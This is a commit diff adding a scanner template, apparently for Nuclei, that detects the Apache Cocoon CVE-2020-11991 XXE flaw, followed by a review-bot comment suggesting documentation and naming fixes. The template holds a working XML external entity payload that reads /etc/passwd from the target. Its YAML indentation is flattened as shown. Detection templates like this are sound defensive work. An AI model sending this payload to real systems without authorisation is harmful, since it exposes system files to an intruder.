Create CVE-2020-11991.yaml
parent
adb9bcfd0c
commit
8e8d7af37b
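--- a/CVE-2020-11991.yaml
+++ b/CVE-2020-11991.yaml
@@ -0,0 +1,33 @@
+id: CVE-2020-11991
+
+info:
+name: Apache Cocoon 2.1.12 XML Injection
+author: pikpikcu
+severity: high
+reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11991
+
+requests:
+- method: POST
+path:
+- "{{BaseURL}}/v2/api/product/manger/getInfo"
+# - "{{BaseURL}}/v2/api/product/manger/getinfo"
+headers:
+Content-type: "text/xml"
+body: |
+<!--?xml version="1.0" ?-->
+<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
+<userInfo>
+<firstName>John</firstName>
+<lastName>&ent;</lastName>
+</userInfo>
+
+matchers-condition: and
+matchers:
+
+- type: regex
+regex:
+- "root:[x*]:0:0"
+
+- type: status
+status:
+- 200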
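Review bot: The `info` block has no `description`, so a finding from this template gives the person triaging it only the CVE id and a link; add one, for example `description: The server resolved an external XML entity from a POST body and returned local file contents. Upgrade Cocoon and disable external entity resolution in the XML parser.` The `name` says "XML Injection" while the request body checks external entity resolution, so calling it XXE in the name would make results easier to route to the right fix. The commented-out lowercase `getinfo` path should either be removed or given a one-line comment saying when it applies. The first body line, `<!--?xml version="1.0" ?-->`, is an XML comment rather than a declaration; it is probably harmless but looks like a copy artefact and is worth confirming.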